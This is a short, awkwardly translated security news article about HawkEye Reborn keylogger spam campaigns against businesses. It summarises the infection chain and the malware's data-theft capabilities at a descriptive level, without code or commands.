“In the cybercrime arena, most financially motivated threat actors are focused on businesses because that is where they can make larger profits than attacks on individual users. Businesses have more data, many users on the same network and larger bank accounts that criminals prey on. X-Force is not surprised to see HawkEye operators follow the trend that’s become somewhat of a cybercrime norm”, — report X-Force specialists.
Criminals interested in confidential data and credentials that later used for stealing accounts and attacks on corporate emails.
Besides, HawkEye can upload malware programs on infected devices.
During the April and May spam-campaigns attackers spread HawkEye Reborn versions 8.0 and 9.0 in letters allegedly from banks and other legitimate organizations, but, according to researchers, attached pictures of low quality and poorly formatted text. In attachments letters contained archive with malware file, previously converted from PDF into PNG, and later in LNK. While unpacking it secretly starts keylogger, and, distracting attention, reflected fake recipe.
For infecting devices were used several executable files. Firstly, mshta.exe that involved PowerShell-script for connection to the located on the attackers’ AWS C&C-server and uploaded additional parts of a program. Secondly, was gvg.exe that contained Autolt-scenario, which ensured automatic start of a keylogger after system’s restart.
In the last six years, malware got multiply additional modules that extend opportunities for spying and stealing information. Next keylogger’s version, HawkEye Reborn 9, can collect information from different applications and send it to operators, using FTP, HTTP and SMTP protocols.
Experts say that in December 2018 program came to other owner and now is spread on DarkNet forums through intermediaries.
“Recent owner’s change and renewed process of HawkEye Reborn development demonstrate that this threat will develop in future”, – noted researchers from Cisco Talos.
Source: https://securityintelligence.com
About Pbmsoultions.com Pbmsoultions.com pop-ups can not launch out of the blue. If you have actually…
About Prizestash.com Prizestash.com pop-ups can not expose out of the blue. If you have actually…
About Verifiedbreaking.com Verifiedbreaking.com pop-ups can not launch out of nowhere. If you have actually clicked…
About Themoneyminutes.com Themoneyminutes.com pop-ups can not launch out of the blue. If you have actually…
About News-xcidizi.com News-xcidizi.com pop-ups can not introduce out of nowhere. If you have clicked some…
About Everytraffic-flow.com Everytraffic-flow.com pop-ups can not launch out of nowhere. If you have actually clicked…